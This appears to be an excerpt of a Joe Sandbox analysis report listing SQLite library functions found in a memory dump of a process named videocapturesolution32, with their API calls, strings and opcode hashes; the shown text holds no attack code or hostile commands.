                                                          • Snapshot File: hcaresult_4_2_60900000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: sqlite3_log
                                                          • String ID: d$|
                                                          • API String ID: 632333372-415524447
                                                          • Opcode ID: b41da94c8e0873fb31ce46b9bf1ec845f2d469f37e36bd2a55cc8f8885e561b5
                                                          • Instruction ID: dac03e427e93f591f5d1737f90c886445feec93ea56e6f6f32424ebbe55d5cce
                                                          • Opcode Fuzzy Hash: b41da94c8e0873fb31ce46b9bf1ec845f2d469f37e36bd2a55cc8f8885e561b5
                                                          • Instruction Fuzzy Hash: 50510970A04329DBDB26CF19C981799BBBABF55308F0481D9E958AB341D735EE81CF41
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2975708946.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                          • Associated: 00000004.00000002.2975680159.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975764538.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975811790.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975833883.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975855687.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_60900000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: sqlite3_log
                                                          • String ID: -- $d
                                                          • API String ID: 632333372-777087308
                                                          • Opcode ID: 04c39e600f9b005651fcb68da317ac4a80b79d2e803021aaf364a84fff9736a0
                                                          • Instruction ID: 827f605eab188c5b26b82399601ab0ab65c2dc521f736992582695f4996adf34
                                                          • Opcode Fuzzy Hash: 04c39e600f9b005651fcb68da317ac4a80b79d2e803021aaf364a84fff9736a0
                                                          • Instruction Fuzzy Hash: 5651F674A042689FDB26CF28C885789BBFABF55304F1081D9E99CAB341C7759E85CF41
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2975708946.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                          • Associated: 00000004.00000002.2975680159.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975764538.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975811790.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975833883.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975855687.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_60900000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: sqlite3_logsqlite3_value_text
                                                          • String ID: string or blob too big
                                                          • API String ID: 2320820228-2803948771
                                                          • Opcode ID: 4552165c49a92a3f1eebbde7746405f837ee0ef0562a3825501d2540ddfe4a5c
                                                          • Instruction ID: 1f8da1134a73d261049fdcd83983d84c916c8a3f87851362e697cdb17b1d2bab
                                                          • Opcode Fuzzy Hash: 4552165c49a92a3f1eebbde7746405f837ee0ef0562a3825501d2540ddfe4a5c
                                                          • Instruction Fuzzy Hash: F631D9B0A083249BCB25DF28C881799B7FABF69304F0085DAE898A7301D775DE81CF45
                                                          APIs
                                                          • sqlite3_aggregate_context.SQLITE3 ref: 60914096
                                                          • sqlite3_value_numeric_type.SQLITE3 ref: 609140A2
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2975708946.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                          • Associated: 00000004.00000002.2975680159.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975764538.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975811790.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975833883.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975855687.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_60900000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: sqlite3_aggregate_contextsqlite3_value_numeric_type
                                                          • String ID:
                                                          • API String ID: 3265351223-3916222277
                                                          • Opcode ID: 46809e466d9dc696839b8d734d1d71a7cd961db8d22299a3a9f395bc6b436a6c
                                                          • Instruction ID: a3c0f903ff645dd1c5a8146eaa2078e963ad6c1b8d1bbf61d5d4caeb1888773d
                                                          • Opcode Fuzzy Hash: 46809e466d9dc696839b8d734d1d71a7cd961db8d22299a3a9f395bc6b436a6c
                                                          • Instruction Fuzzy Hash: 19119EB0A0C6589BDF059F69C4D539A7BF6AF39308F0044E8D8D08B205E771CD94CB81
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2975708946.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                          • Associated: 00000004.00000002.2975680159.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975764538.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975811790.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975833883.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975855687.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_60900000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: sqlite3_stricmp
                                                          • String ID: log
                                                          • API String ID: 912767213-2403297477
                                                          • Opcode ID: 32625358f7d37366d1c1d188942de81712d107425b8b720a67b4b84d1adec0cd
                                                          • Instruction ID: cbf508da25866b0a35bc2ca480d64d7c482f0664b0359b741109bd545b4f9ff5
                                                          • Opcode Fuzzy Hash: 32625358f7d37366d1c1d188942de81712d107425b8b720a67b4b84d1adec0cd
                                                          • Instruction Fuzzy Hash: FD11DAB07087048BE725AF66C49535EBBB3ABA1708F10C42CE4854B784C7BAC986DB42
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2975708946.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                          • Associated: 00000004.00000002.2975680159.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975764538.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975811790.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975833883.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975855687.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_60900000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: sqlite3_strnicmp
                                                          • String ID: SQLITE_
                                                          • API String ID: 1961171630-787686576
                                                          • Opcode ID: 6b56a851e7df47422a7a29131339b4dfcb3302745a705f9abe90012807219487
                                                          • Instruction ID: 6d5ef3c0fd507030b5e8170497320435726bf3f0db30f2d6f2734bcd7f756fb3
                                                          • Opcode Fuzzy Hash: 6b56a851e7df47422a7a29131339b4dfcb3302745a705f9abe90012807219487
                                                          • Instruction Fuzzy Hash: 2501D6B190C3505FD7419F29CC8075BBFFAEBA5258F10486DE89687212D374DC81D781
                                                          APIs
                                                          • sqlite3_value_bytes.SQLITE3 ref: 6091A1DB
                                                          • sqlite3_value_blob.SQLITE3 ref: 6091A1FA
                                                          Strings
                                                          • Invalid argument to rtreedepth(), xrefs: 6091A1E3
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2975708946.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                          • Associated: 00000004.00000002.2975680159.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975764538.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975811790.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975833883.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975855687.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_60900000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: sqlite3_value_blobsqlite3_value_bytes
                                                          • String ID: Invalid argument to rtreedepth()
                                                          • API String ID: 1063208240-2843521569
                                                          • Opcode ID: 11a8b631faa983fdd1b04a57150add771201859657fb9a8a7ca9793758d49f10
                                                          • Instruction ID: c9489564a96cd83e586e3a08c251b8a8c74d553169181c25a19da25ffef599d7
                                                          • Opcode Fuzzy Hash: 11a8b631faa983fdd1b04a57150add771201859657fb9a8a7ca9793758d49f10
                                                          • Instruction Fuzzy Hash: 0FF0A4B2A0C2589BDB00AF2CC88255577A6FF24258F1045D9E9858F306EB34DDD5C7D1
                                                          APIs
                                                          • sqlite3_soft_heap_limit64.SQLITE3 ref: 609561D7
                                                            • Part of subcall function 6092A43E: sqlite3_initialize.SQLITE3 ref: 6092A450
                                                            • Part of subcall function 6092A43E: sqlite3_mutex_enter.SQLITE3 ref: 6092A466
                                                            • Part of subcall function 6092A43E: sqlite3_mutex_leave.SQLITE3 ref: 6092A47F
                                                            • Part of subcall function 6092A43E: sqlite3_memory_used.SQLITE3 ref: 6092A4BA
                                                          • sqlite3_soft_heap_limit64.SQLITE3 ref: 609561EB
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2975708946.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                          • Associated: 00000004.00000002.2975680159.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975764538.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975811790.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975833883.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975855687.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_60900000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: sqlite3_soft_heap_limit64$sqlite3_initializesqlite3_memory_usedsqlite3_mutex_entersqlite3_mutex_leave
                                                          • String ID: soft_heap_limit
                                                          • API String ID: 1251656441-405162809
                                                          • Opcode ID: 0a3178e3d5348c0d1dba646aca47308acc52713326f376e4eba91e5107f5ba07
                                                          • Instruction ID: 8891d4bbc0f5aef5547f00e3070395c34840fc2012d087b050684f6162b0ba7d
                                                          • Opcode Fuzzy Hash: 0a3178e3d5348c0d1dba646aca47308acc52713326f376e4eba91e5107f5ba07
                                                          • Instruction Fuzzy Hash: C2014B71A083188BC710EF98D8417ADB7F2BFA5318F508629E8A49B394D730DC42CF41
                                                          APIs
                                                          • sqlite3_log.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6094A57F), ref: 6092522A
                                                          • sqlite3_log.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6094A57F), ref: 60925263
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2975708946.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                          • Associated: 00000004.00000002.2975680159.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975764538.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975811790.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975833883.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975855687.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_60900000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: sqlite3_log
                                                          • String ID: NULL
                                                          • API String ID: 632333372-324932091
                                                          • Opcode ID: f56f6a0e8a895df1b0101c46b9851dc3af9ce5b0d95800d46be4b721d61d1ab1
                                                          • Instruction ID: 5a36de60e8574ea04015b231464f09686a41744340efbe7a8a869d8181b3dc96
                                                          • Opcode Fuzzy Hash: f56f6a0e8a895df1b0101c46b9851dc3af9ce5b0d95800d46be4b721d61d1ab1
                                                          • Instruction Fuzzy Hash: BAF0A070238301DBD7102FA6E44230E7AEBABB0798F48C43C95A84F289D7B5C844CB63
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2975708946.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                          • Associated: 00000004.00000002.2975680159.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975764538.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975811790.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975833883.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975855687.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_60900000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: CriticalSection$EnterLeavefree
                                                          • String ID:
                                                          • API String ID: 4020351045-0
                                                          • Opcode ID: 13d179c58506242de641c1793229aaf6d73ae3266bd26a3d41fb94aeb54caf06
                                                          • Instruction ID: 980a39aab3b848caec2c27f45d5308e77b440585e3cd6ccd446b63c63d51e1b6
                                                          • Opcode Fuzzy Hash: 13d179c58506242de641c1793229aaf6d73ae3266bd26a3d41fb94aeb54caf06
                                                          • Instruction Fuzzy Hash: 2D018070B293058BDB10DF28C985919BBFBABB6308B20855CE499D7355D770DC80EB62
                                                          APIs
                                                          • EnterCriticalSection.KERNEL32(?,?,?,6096D655,?,?,?,?,?,6096CF88), ref: 6096D4DF
                                                          • TlsGetValue.KERNEL32(?,?,?,?,6096D655,?,?,?,?,?,6096CF88), ref: 6096D4F5
                                                          • GetLastError.KERNEL32(?,?,?,?,?,6096D655,?,?,?,?,?,6096CF88), ref: 6096D4FD
                                                          • LeaveCriticalSection.KERNEL32(?,?,?,?,6096D655,?,?,?,?,?,6096CF88), ref: 6096D520
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2975708946.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                          • Associated: 00000004.00000002.2975680159.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975764538.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975811790.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975833883.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975855687.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_60900000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: CriticalSection$EnterErrorLastLeaveValue
                                                          • String ID:
                                                          • API String ID: 682475483-0
                                                          • Opcode ID: 79e4c3a08b5363d98cc33068bb7bbdcd271105d9d9d9c252471cf05fac27a945
                                                          • Instruction ID: 6dd43474153c21470d2d90641e64b96ed0da30414b2d41baa8b5e8831fa3fcb2
                                                          • Opcode Fuzzy Hash: 79e4c3a08b5363d98cc33068bb7bbdcd271105d9d9d9c252471cf05fac27a945
                                                          • Instruction Fuzzy Hash: 9AF0F972A163104BEB10AF659CC1A5A7BFDEFB1218F100048FC6197354E770DC40D6A2